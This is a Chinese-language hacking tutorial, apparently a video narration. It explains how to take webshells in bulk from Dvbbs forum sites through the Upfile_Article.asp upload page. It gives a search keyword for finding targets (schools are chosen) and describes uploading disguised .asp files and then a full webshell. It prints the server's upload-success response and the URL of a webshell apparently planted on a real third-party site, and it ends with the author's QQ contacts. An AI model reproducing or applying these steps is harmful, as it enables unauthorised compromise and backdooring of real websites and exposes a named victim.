关键字: by mypower
漏洞面页:Upfile_Article.asp
大家好 我是黑色叛逆,好久没有给大家做动画了。。。
今天给大家做一个关于批量拿动网SHELL的教程。。
用的工具相信大家手上都有。。。
我们现在打开网手猎手
关键字: by mypower相信大家都搞过吧。。这里我就随便改一下。。
关键字不同搜出来的结果就不同相信这个大家都知道
不要我给出来的关键字你就跟着打,,那样没什么效果你可以自己发挥好
我们开始 这里我就搜学校吧。。。大家自己想搜什么就打什么,,,
这里我就搜5页吧。。如果自己要拿SHELL就多搜一点。。
漏洞面页:Upfile_Article.asp 这是动网的一个上传面页。我们就利用它来上传。。
最终拿到SHELL
搜中。。。。。
好我们现在拿出旁注来。。上传。
看好了选择的这个不行换个。。
看上传成功了
parent.parent.AddItem('UploadFiles/2006122221018285.gif')
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script><SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.text='[upload=asp ]UploadFiles/2006122221019228.asp [/upload]';
parent.parent.AddItem('UploadFiles/2006122221019228.asp ')
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script>
</body>
</html>
看成功了。。接下来传大马。。
http://www.zb15.com.cn/UploadFiles/k.asp 大马也传上来了。。。进去看看吧。
我们在找找
看又一个
可能是我搜的关键字不太好所以没有很多。。有很多不能用这个BUG很久了。。
只是一个网站管理员没有补吧。。
好了教程到这里了
我的QQ:44929950
群:16019006
您现在的位置: